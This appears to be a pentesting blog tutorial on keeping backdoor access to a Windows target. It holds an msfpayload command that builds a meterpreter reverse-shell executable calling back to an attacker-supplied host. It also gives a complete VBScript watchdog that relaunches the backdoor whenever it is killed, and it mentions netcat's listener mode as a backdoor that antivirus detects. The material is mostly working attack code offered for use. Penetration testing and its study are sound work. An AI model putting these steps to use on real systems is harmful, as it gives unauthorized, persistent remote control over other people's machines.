It is not usually common that a pentester needs persistent access to a target. However, cases do arise when it becomes necessary. For instance, the target service could be unreliable or only running at certain times. Also, a particular host may be the only entry point into a target environment. So, installing a reliable backdoor can come in handy under these circumstances.

Netcat has a hard listerner switch “-L” which makes it a nice backdoor tool, but unmodified netcat.exe binaries are easily detected by antivirus. One of my favorite backdoors is the meterpreter.dll which can be packaged into an executable for reverse access back to the attacker’s workstation.
./msfpayload windows/meterpreter/reverse_tcp LHOST=attack.er.ip.addy LPORT=4444 X > meterpreter.exe
The problem:

Whenever the attacker quits the meterpreter session, or if the session crashes due to some thing like a process migration, then the meterpreter.exe process running on the target machine stops. Now, it is always possible to create a scheduled task or create a registry key to restart the meterpreter.exe on boot, but sometimes that is not desirable because you have to wait for the target machine to reboot, and such registry keys and scheduled tasks can be messy to clean up.

The Solution:

Here is a simple .vbs script that will launch an executable, and then wait a specified amount of time before checking to see if the executable is still running. If it has been terminated for some reason, it will relaunch the executable. This script will run indefinitely. NOTE: in order to stop the script, you must kill the wscript.exe process.

The following example waits 5 seconds before checking the processes and relaunching if needed.

Copy and paste following code to a text file called persist.vbs
state = 1
While state = 1
Set WshShell = WScript.CreateObject ("WScript.Shell")
Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")
For Each objProcess in colProcessList
if objProcess.name = "meterpreter.exe" then
vFound = True
End if
Next
If vFound = True then
wscript.sleep 5000
Else
WshShell.Run ("C:\PATH\TO\YOUR\EXE\meterpreter.exe")
wscript.sleep 5000
End If
vFound = False
Wend

You can run your newly created script by typing the following at the command prompt:
cscript persist.vbs